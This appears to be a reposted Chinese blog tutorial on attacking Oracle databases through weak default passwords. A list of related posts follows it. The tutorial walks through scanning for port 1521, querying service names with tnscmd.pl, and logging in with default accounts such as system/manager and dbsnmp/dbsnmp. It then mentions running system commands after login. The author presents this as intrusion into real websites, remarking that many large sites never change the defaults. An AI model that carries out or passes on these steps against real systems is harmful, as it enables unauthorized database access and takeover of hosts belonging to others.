oracle弱口令攻击
oracle弱口令攻击
0x00 oracle数据库简介
oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:
一、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到>几百千兆,可充分利用硬件设备。支持大量用户同时在
同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高>的性能,Oracle每天可连续24小时工作,正常的系统操作
(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数据库级上控制。
二、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以>它是一个开放系统,保护了用户的投资。美国标准化和技术
研究所(NIST)对Oracle7 SERVER进行检验,100%地与ANSI/ISO SQL89标准的二级相>兼容。
三、实施安全性控制和完整性控制。Oracle为限制各监控数据存取提供系统可靠的安全>性。Oracle实施数据完整性,为可接受的数据指定标准。
四、支持分布式数据库和分布处理。Oracle为了充分利用计算机系统和网络,允许将处理分为数据库服务器和客户应用程序,所有共享的数据管理 由数据库管理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境,Oracle将存放在多台计算机上的 数据组合成一个逻辑数据库,可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。 具有可移植性、可兼容性和可连接性。由于Oracle软件可在许多不同的操作系统上运 行,以致Oracle上所开发的应用 可移植到任何操作系统,只需很少修改或不需修改。Oracle软件同工业标准相兼容,包括很多工业标准的操作系统, 所开发应用系统可在任何操作系统上运行。可连接性是指ORALCE允许不同类型的计算机和操作系统通过网络可共享信息。
虽然Oracle数据库具有很高的安全性,但是如果我们在配置的时候不注意安全意识,那么也是很危险的。也就是说,安全最主要的还是要靠人自己,而不能过分依赖软件来实现。
我们知道,在 mssql
中,安装完成后默认有个sa的登陆密码为空,如果不更改就会产生安全漏洞。那么 oracle
呢?也有的。
为了安装和调试的方便,Oracle数据库中的两个具有 DBA
权限的用户 Sys
和 System
的缺省密码是 manager
。
笔者发现很多国内网站的Oracle数据库没有更改这两个用户的密码,其中也包括很多大型的电子商务网站, 我们就可以利用
进行测试前我们先来了解一些相关的知识,我们连接一个 Oracle
数据库的时候,需要知道它的 service_name
或者是 Sid
值,就象 mssql
一样,需要知道数据库名。那如何去知道呢,猜?呵呵,显然是不行的。这里我们先讲讲 oracle
的 TNS listener
,它位于数据库 Client
和数据库 Server
之间,默认监听1521端口,这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话,oracle将不会返回它的banner,如果你输入一些东西的话,它甚至有可能把你踢出去。这里我们就需要用 tnscmd.pl
这个 perl
程序了,它可以查询远程oracle数据库是否开启(也就是ping了),查询版本,以及查询它的服务
名,服务状态和数据库服务名,而且正确率很高。
0x01 oracle弱口令攻击
理论方面的讲完了,如果还有什么不懂的可以去查找相关资料。现在开始测试吧,需要的工具有:
ActivePerl
,Oracle客户端
,Superscan
或者是其它扫描端口的软件
,Tnscmd.pl
。
我们先用 Superscan
扫描开放了端口1521的主机,假设其IP是 xx.xx.110.110
,这样目标已经有了。然后我们要做的就是用Tnscmd.pl 来查询远程数据库的服务名了,
Tnscmd.pl的用法如下:
C:perlbin>perl tnscmd.pl usage: tnscmd.pl [command] -h hostname where 'command' is something like ping, version, status, etc. (default is ping) [-p port] - alternate TCP port to use (default is 1521) [--logfile logfile] - write raw packets to specified logfile [--indent] - indent & outdent on parens [--rawcmd command] - build your own CONNECT_DATA string [--cmdsize bytes] - fake TNS command size (reveals packet leakage)
我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。
然后我们就这样来:
C:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent sending (CONNECT_DATA=(COMMAND=services)) to xx.xx.110.110:1521 writing 91 bytes reading ._.......6.........?. .......... DESCRIPTION= TMP= VSNNUM=135286784 ERR=0 SERVICES_EXIST=1 .Q........ SERVICE= SERVICE_NAME=ORCL INSTANCE= INSTANCE_NAME=ORCL NUM=1 INSTANCE_CLASS=ORACLE HANDLER= HANDLER_DISPLAY=DEDICATED SERVER STA=ready HANDLER_INFO=LOCAL SERVER HANDLER_MAXLOAD=0 HANDLER_LOAD=0 ESTABLISHED=447278 REFUSED=0 HANDLER_ID=8CA61D1BBDA6-3F5C-E030-813DF5430227 HANDLER_NAME=DEDICATED ADDRESS= PROTOCOL=beq PROGRAM=/home/oracle/bin/oracle ENVS='ORACLE_HOME=/home/oracle,ORACLE_SID=ORCL' ARGV0=oracleORCL ARGS=' LOCAL=NO ' .........@
从上面得到的信息我们可以看出数据库的服务名为ORCL,然后我们就可以通过 sqlplus
工具来远程连上它了,
用户名和密码我们用默认的 system/manager
或者是 sys/manager
,其他的如 mdsys/mdsys
, ctxsys/ctxsys
等,
这个默认用户和密码是随版本的不同而改变的。如下:
C:oracleora90BIN>sqlplus /nolog
SQL*Plus: Release 9.0.1.0.1 - Production on Thu May 23 11:36:59 2002
(c) Copyright 2001 oracle Corporation. All rights reserved.
SQL>connect system/manager@
(description=(address_list=(address=(protocol=tcp)
(host=xx.xx.110.110)(port=1521)))
(connect_data=(SERVICE_NAME=ORCL)));
如果密码正确,那么就会提示 connected
,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用 dbsnmp/dbsnmp
都能进去。当然如果对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。
0x02 上面提到的两个小软件:
tnscmd.pl
代码: tnscmd.pl
用链表实现的oracle密码暴破程序
代码: 用链表实现的oracle密码暴破程序
0x03 利用弱口令进行入侵:
#
C:\>sqlplus /nolog SQL> connect system/manager@(description=(address_list=(address=(protocol=tcp)(host=www.xx.com) (port=1521)))(connect_data=(SERVICE_NAME=ora9i)));
然后利用 OracleExecuteCommandSqlScript
来执行系统命令
转载于:https://www.cnblogs.com/-qing-/p/10728713.html
oracle弱口令攻击相关推荐
- web入侵二之弱口令攻击及其他
一.什么是弱口令 就是说由常用数字.字母.字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果 二.共享入侵--IPC$ IPC ...
- oracle 弱口令扫描器,超级弱口令检查工具,检查SSH/FTP/MySQL/Oracle/SQLServer弱口令
超级弱口令检查工具 V1.0 简介: 超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码.弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自 ...
- 【web安全】Web应用隔离防护之Web弱口令爆破
背景 近些年来,国内政府和企业网站被篡改的类似黑客攻击入侵事件频出,造成的社会影响及经济损失巨大,越来越多的企事业单位高度重视Web应用安全. 其中,黑客针对Web应用资产发起的弱口令攻击尤为常见. ...
- 弱口令漏洞与验证码绕过——渗透day04
目录 一.基于远程服务的弱口令攻击 (一)服务暴力破解软件 (二)实验 二.基于web的弱口令测试 (一)基于表单的暴力破解 (二)验证码绕过(on client) 1.通过Script Blocke ...
- 渗透测试——SSH弱口令暴破0x01
1.1 SSH服务协议说明 SSH 是 Secure Shell Protocol 的简写,由 IETF 网络工作小组(Network Working Group )制定:在进行数据传输之前,SSH先 ...
- 防范攻击 加强管控 - 数据库安全的16条军规
近日的数据安全事故,引发了很多企业的普遍关注,而不少用户从彻查中确实发现自己的数据库已经被注入,这为大家上了数据安全的重要一课. 甚至有的企业要求停用PL/SQL Developer这一工具,虽然这从 ...
- “删库跑路”重现江湖,技术和制度如何保障数据安全?
摘要:近日,一则来自微盟官网的消息在业内引起轩然大波,"删库跑路"重现江湖--由此,关于如何从技术和制度两方面进行数据安全防范的关注和讨论广泛展开. 近日,一则来自微盟官网的消息在 ...
- 静默错误:为什么看了那么多灾难,还是过不好备份这一关?
近日,关于腾讯云的一则事故在朋友圈刷屏. 事件回放 腾讯云披露的整个事件的基本情况如下: 8月6日 消息:近日,腾讯云用户"前沿数控"平台一块操作系统云盘,因受所在物理硬盘固件版本 ...
- 0905系统及数据库
枚举:相当于字典,提前解密好字符明文,再对比密文 常见加密编码等算法解析 URL:%开始,' '空格等特殊字符会编译 BASE64:明文越长密文越长,大小写+数字混编,密文后面常出现'=':常用在代码 ...
- 包含下载,数据安全,数据备份16条军规
更多精彩请关注"数据和云"公众号 这可能是你需要的: https://bethune.enmotech.com/ 关注 Oracle 18c 新特性,Oracle 18.3 最新动 ...
最新文章
- 【iOS-Cocos2d游戏开发之五】【1】多触点与触屏事件详解(单一监听、事件分发)...
- 分享Silverlight/WPF/Windows Phone一周学习导读(10月1日-10月15日)
- java修改JFrame默认字体
- 字符串切割(split())
- mysql5.7.12 my.ini文件_MySQL5.7缺少my.ini文件的解决方法
- 网站如何接入第三方登录,微信登录和QQ登录:注册认证篇
- LeetCode 2008. 出租车的最大盈利(DP)
- LeetCode 410. 分割数组的最大值(极小极大化 二分查找 / DP)
- C语言函数名以及取地址的区别和联系
- OA系统身份认证的设计
- [Bzoj2120]数颜色
- SwiftyJSON解析本地JSON文件
- windows 删除php,windows软链接(mklink)的建立及删除的用法示例
- 《2021中国数据智能产业图谱3.0升级版》重磅发布
- 【绝知此事要躬行】线性表之链表OJ(下)
- tp5 in_array 在 view页面用法
- 未成年人勿进 谨以献给1980~1990出生的人(三)
- MATLAB中实现图像的空间域滤波和频率域滤波
- send_nsca passive monitor setup notes
- Java判断日期在指定时间段中的第几周